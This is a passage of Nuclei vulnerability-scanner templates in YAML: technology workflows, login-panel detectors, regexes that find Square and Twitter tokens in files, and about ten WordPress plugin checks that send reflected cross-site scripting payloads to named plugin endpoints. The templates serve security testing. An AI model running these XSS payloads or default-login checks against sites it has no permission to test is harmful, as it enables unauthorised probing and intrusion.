7 | 8 | workflows: 9 | - template: exposed-panels/rstudio-detect.yaml 10 | subtemplates: 11 | - tags: rstudio -------------------------------------------------------------------------------- /sage-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sage-panel 2 | 3 | info: 4 | name: Sage X3 Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Sage X3" 9 | tags: panel,sage,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/auth/login/page" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "Sage X3" 22 | - "'/auth/sage-id/registerStart'" 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /saltstack-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: saltstack-workflow 2 | 3 | info: 4 | name: SaltStack Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SaltStack related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: saltstack 12 | subtemplates: 13 | - tags: saltstack -------------------------------------------------------------------------------- /sarg-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sarg-workflow 2 | 3 | info: 4 | name: SARG Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SARG related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: sarg 12 | subtemplates: 13 | - tags: sarg -------------------------------------------------------------------------------- /sco-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sco-workflow 2 | 3 | info: 4 | name: SCO Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SCO related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: sco 12 | subtemplates: 13 | - tags: sco -------------------------------------------------------------------------------- /seeddms-panel.yaml: -------------------------------------------------------------------------------- 1 | id: seeddms-panel 2 | 3 | info: 4 | name: SeedDMS Login Panel 5 | author: pussycat0x,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"SeedDMS" 9 | tags: panel,seeddms,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" 15 | - "{{BaseURL}}/dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" 16 | 17 | redirects: true 18 | max-redirects: 2 19 | stop-at-first-match: true 20 | matchers-condition: and 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - 'href="/out/out.ViewFolder.php">SeedDMS' 26 | - 'href="../out/out.ViewFolder.php?folderid=1">SeedDMS' 27 | condition: or 28 | 29 | - type: status 30 | status: 31 | - 200 -------------------------------------------------------------------------------- /sequoiadb-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sequoiadb-workflow 2 | 3 | info: 4 | name: SequoiaDB Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SequoiaDB related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/sequoiadb-login.yaml 10 | subtemplates: 11 | - template: default-logins/sequoiadb/sequoiadb-default-login.yaml 12 | -------------------------------------------------------------------------------- /sharepoint-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sharepoint-workflow 2 | 3 | info: 4 | name: Microsoft Sharepoint Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Microsoft Sharepoint related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: sharepoint 12 | subtemplates: 13 | - tags: sharepoint -------------------------------------------------------------------------------- /shopxo-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: shopxo-workflow 2 | 3 | info: 4 | name: ShopXO Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all ShopXO related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: shopxo 12 | subtemplates: 13 | - tags: shopxo -------------------------------------------------------------------------------- /sidekiq-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sidekiq-workflow 2 | 3 | info: 4 | name: Sidekiq Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Sidekiq related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/sidekiq-dashboard.yaml 10 | subtemplates: 11 | - tags: sidekiq 12 | -------------------------------------------------------------------------------- /skywalking-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: skywalking-workflow 2 | 3 | info: 4 | name: Apache SkyWalking Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apache SkyWalking related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: skywalking 12 | subtemplates: 13 | - tags: skywalking -------------------------------------------------------------------------------- /solr-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: solr-workflow 2 | 3 | info: 4 | name: Apache Solr Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apache Solr related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/solr-exposure.yaml 10 | subtemplates: 11 | - tags: solr 12 | -------------------------------------------------------------------------------- /sonarqube-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sonarqube-workflow 2 | 3 | info: 4 | name: SonarQube Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SonarQube related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/sonarqube-login.yaml 10 | subtemplates: 11 | - tags: sonarqube -------------------------------------------------------------------------------- /sourcebans-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sourcebans-workflow 2 | 3 | info: 4 | name: SourceBans Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SourceBans related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: sourcebans 12 | subtemplates: 13 | - tags: sourcebans -------------------------------------------------------------------------------- /splunk-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: splunk-workflow 2 | 3 | info: 4 | name: Splunk Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Splunk related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: splunk 12 | subtemplates: 13 | - tags: splunk -------------------------------------------------------------------------------- /square-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: square-access-token 2 | 3 | info: 4 | name: Square Access Token 5 | author: gaurang,daffainfo 6 | severity: high 7 | tags: token,file,square 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "EAAAE[a-zA-Z0-9_-]{59}" 17 | - "sq0atp-[0-9A-Za-z\\-_]{22}" 18 | -------------------------------------------------------------------------------- /squirrelmail-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: squirrelmail-workflow 2 | 3 | info: 4 | name: SquirrelMail Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SquirrelMail related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/squirrelmail-login.yaml 10 | subtemplates: 11 | - tags: squirrelmail 12 | -------------------------------------------------------------------------------- /strapi-cms-detect.yaml: -------------------------------------------------------------------------------- 1 | id: strapi-cms-detect 2 | 3 | info: 4 | name: Strapi CMS detect 5 | author: cyllective,daffainfo,idealphase 6 | severity: info 7 | description: Open source Node.js Headless CMS to easily build customisable APIs 8 | reference: 9 | - https://github.com/strapi/strapi 10 | tags: tech,strapi,cms 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/admin/init" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"data"' 23 | - '"uuid"' 24 | - '"hasAdmin"' 25 | condition: and 26 | 27 | - type: status 28 | status: 29 | - 200 30 | 31 | extractors: 32 | - type: regex 33 | part: body 34 | group: 1 35 | regex: 36 | - '"strapiVersion":"([0-9.]+)"' 37 | -------------------------------------------------------------------------------- /subrion-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: subrion-workflow 2 | 3 | info: 4 | name: Subrion CMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Subrion CMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: subrion 12 | subtemplates: 13 | - tags: subrion -------------------------------------------------------------------------------- /sugarcrm-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sugarcrm-workflow 2 | 3 | info: 4 | name: SugarCRM Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SugarCRM related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: sugarcrm 12 | subtemplates: 13 | - tags: sugarcrm -------------------------------------------------------------------------------- /symfony-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: symfony-workflow 2 | info: 3 | name: Symfony Security Checks 4 | author: daffainfo 5 | description: A simple workflow that runs all Symfony related nuclei templates on a given target. 6 | 7 | workflows: 8 | - template: technologies/tech-detect.yaml 9 | matchers: 10 | - name: symfony 11 | subtemplates: 12 | - tags: symfony -------------------------------------------------------------------------------- /tapestry-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: tapestry-workflow 2 | 3 | info: 4 | name: Apache Tapestry Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apache Tapestry related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/apache/apache-tapestry-detect.yaml 10 | subtemplates: 11 | - tags: tapestry 12 | -------------------------------------------------------------------------------- /terramaster-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: terramaster-workflow 2 | 3 | info: 4 | name: TerraMaster Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all TerraMaster related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/terramaster-login.yaml 10 | subtemplates: 11 | - tags: terramaster 12 | -------------------------------------------------------------------------------- /thinfinity-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: thinfinity-workflow 2 | 3 | info: 4 | name: Thinfinity VirtualUI Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Thinfinity VirtualUI related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/thinfinity-virtualui-panel.yaml 10 | subtemplates: 11 | - tags: thinfinity 12 | -------------------------------------------------------------------------------- /thinkadmin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: thinkadmin-workflow 2 | 3 | info: 4 | name: ThinkAdmin Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all ThinkAdmin related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: thinkadmin 12 | subtemplates: 13 | - tags: thinkadmin -------------------------------------------------------------------------------- /thinkcmf-detect.yaml: -------------------------------------------------------------------------------- 1 | id: thinkcmf-detection 2 | 3 | info: 4 | name: Detect ThinkCMF 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | tags: panel,thinkcmf,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - '' 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /thruk-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: thruk-workflow 2 | 3 | info: 4 | name: Thruk Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Thruk related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/thruk-login.yaml 10 | subtemplates: 11 | - tags: thruk 12 | -------------------------------------------------------------------------------- /tikiwiki-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: tikiwiki-workflow 2 | 3 | info: 4 | name: Tiki Wiki Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Tiki Wiki related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/tikiwiki-cms.yaml 10 | subtemplates: 11 | - tags: tikiwiki 12 | -------------------------------------------------------------------------------- /tongda-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: tongda-workflow 2 | 3 | info: 4 | name: TongDa Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all TongDa related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: tongda 12 | subtemplates: 13 | - tags: tongda 14 | -------------------------------------------------------------------------------- /tpshop-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: tpshop-workflow 2 | 3 | info: 4 | name: TPshop Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all TPshop related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: tpshop 12 | subtemplates: 13 | - tags: tpshop 14 | -------------------------------------------------------------------------------- /traefik-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: traefik-workflow 2 | 3 | info: 4 | name: Traefik Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Traefik related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/traefik-dashboard.yaml 10 | subtemplates: 11 | - tags: traefik 12 | -------------------------------------------------------------------------------- /twitter-secret.yaml: -------------------------------------------------------------------------------- 1 | id: twitter-secret 2 | 3 | info: 4 | name: Twitter Secret 5 | author: gaurang,daffainfo 6 | severity: medium 7 | tags: token,file,twitter 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" 17 | - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" -------------------------------------------------------------------------------- /umbraco-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: umbraco-workflow 2 | 3 | info: 4 | name: Umbraco Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Umbraco related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: umbraco 12 | subtemplates: 13 | - tags: umbraco -------------------------------------------------------------------------------- /vmware-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: vmware-workflow 2 | 3 | info: 4 | name: VMware Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all VMware related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/vmware/vmware-detect.yaml 10 | subtemplates: 11 | - tags: vmware 12 | -------------------------------------------------------------------------------- /voipmonitor-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: voipmonitor-workflow 2 | 3 | info: 4 | name: VoipMonitor Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all VoipMonitor related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/voipmonitor-panel.yaml 10 | subtemplates: 11 | - tags: voipmonitor 12 | -------------------------------------------------------------------------------- /wazuh-panel.yaml: -------------------------------------------------------------------------------- 1 | id: wazuh-panel 2 | 3 | info: 4 | name: Wazuh Login Panel 5 | author: cyllective,daffainfo 6 | severity: info 7 | description: Wazuh - The Open Source Security Platform 8 | reference: 9 | - https://github.com/wazuh/wazuh 10 | metadata: 11 | shodan-query: http.title:"Wazuh" 12 | tags: panel,wazuh,login 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | - "{{BaseURL}}/app/login" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"id":"wazuh"' 25 | - '"title":"Wazuh"' 26 | - '"icon":"plugins/wazuh/img/icon_blue.png"' 27 | - '"url":"/app/wazuh"' 28 | condition: or 29 | 30 | - type: status 31 | status: 32 | - 200 33 | 34 | extractors: 35 | - type: regex 36 | part: body 37 | group: 1 38 | regex: 39 | - '"version":"([0-9.]+)"' -------------------------------------------------------------------------------- /webmin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: webmin-workflow 2 | 3 | info: 4 | name: Webmin Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Webmin related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/webmin-panel.yaml 10 | subtemplates: 11 | - tags: webmin 12 | -------------------------------------------------------------------------------- /webmodule-ee-panel.yaml: -------------------------------------------------------------------------------- 1 | id: webmodule-ee-panel 2 | 3 | info: 4 | name: Webmodule Login Panel 5 | author: pussycat0x,daffainfo 6 | severity: info 7 | reference: 8 | - https://www.exploit-db.com/ghdb/7001 9 | metadata: 10 | google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" 11 | tags: panel,webmodule-ee,login 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/webmodule-ee/login.seam" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | words: 22 | - "Webmodule" 23 | 24 | - type: status 25 | status: 26 | - 200 27 | 28 | extractors: 29 | - type: regex 30 | part: body 31 | group: 1 32 | regex: 33 | - 'Version: ([0-9.]+)' -------------------------------------------------------------------------------- /websvn-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: websvn-workflow 2 | 3 | info: 4 | name: Websvn Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Websvn related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: websvn 12 | subtemplates: 13 | - tags: websvn -------------------------------------------------------------------------------- /wp-ambience-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-ambience-xss 2 | 3 | info: 4 | name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/exploits/38568 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "<body onload=alert(1)>" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-church-admin-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-church-admin-xss 2 | 3 | info: 4 | name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "</script><script>alert(document.domain)</script>" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- 
/wp-custom-tables-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-custom-tables-xss 2 | 3 | info: 4 | name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability 8 | reference: 9 | - https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 10 | tags: wordpress,xss,wp-plugin 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - "</script><script>alert(document.domain)</script>" 22 | part: body 23 | 24 | - type: word 25 | part: header 26 | words: 27 | - text/html 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /wp-finder-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-finder-xss 2 | 3 | info: 4 | name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "</script><script>alert(document.domain)</script>" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-flagem-xss.yaml: 
-------------------------------------------------------------------------------- 1 | id: wp-flagem-xss 2 | 3 | info: 4 | name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/exploits/38674 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "</script><script>alert(document.domain)</script>" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-knews-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-knews-xss 2 | 3 | info: 4 | name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - http://web.archive.org/web/20210213220043/https://www.securityfocus.com/bid/54330/info 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "</script><script>alert(document.domain)</script>" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-nextgen-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-nextgen-xss 2 | 3 | info: 4 | name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | 
severity: medium 7 | reference: 8 | - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "</script><script>alert(document.domain)</script>" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-phpfreechat-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-phpfreechat-xss 2 | 3 | info: 4 | name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info 9 | tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "</script><script>alert(document.domain)</script>" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-securimage-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-securimage-xss 2 | 3 | info: 4 | name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info 9 
| tags: wordpress,xss,wp-plugin 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "<script>alert(1);</script>" 21 | part: body 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /wp-socialfit-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-socialfit-xss 2 | 3 | info: 4 | name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting 5 | author: daffainfo 6 | severity: medium 7 | description: | 8 | SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 9 | reference: 10 | - https://www.exploit-db.com/exploits/37481 11 | tags: wordpress,xss,wp-plugin 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '</script><script>alert(document.domain)</script>' 23 | - type: word 24 | part: header 25 | words: 26 | - "text/html" 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /wuzhicms-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: wuzhicms-workflow 2 | 3 | info: 4 | name: Wuzhicms Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Wuzhicms related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/wuzhicms-detect.yaml 10 | subtemplates: 11 | - tags: wuzhicms 12 | -------------------------------------------------------------------------------- /xdcms-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: xdcms-workflow 2 | 3 | info: 4 | name: XdCMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all XdCMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: xdcms 12 | subtemplates: 13 | - tags: xdcms -------------------------------------------------------------------------------- /xiuno-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: xiuno-workflow 2 | 3 | info: 4 | name: Xiuno Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Xiuno related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: xiuno 12 | subtemplates: 13 | - tags: xiuno -------------------------------------------------------------------------------- /xxljob-panel.yaml: -------------------------------------------------------------------------------- 1 | id: xxljob-panel 2 | 3 | info: 4 | name: XXLJOB Admin Login Panel 5 | author: pdteam,daffainfo 6 | severity: info 7 | tags: panel,xxljob,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xxl-job-admin/toLogin" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - "XXLJOB" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | 25 | extractors: 26 | - type: regex 27 | part: body 28 | group: 1 29 | regex: 30 | - '"admin_version":"(.*?)"' 31 | -------------------------------------------------------------------------------- /xxljob-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: xxljob-workflow 2 | 3 | info: 4 | name: XXL-JOB Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all XXL-JOB related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/xxljob-panel.yaml 10 | subtemplates: 11 | - template: default-logins/xxljob/xxljob-default-login.yaml 12 | -------------------------------------------------------------------------------- /yapi-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: yapi-workflow 2 | 3 | info: 4 | name: YApi Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all YApi related nuclei templates on a given target. 
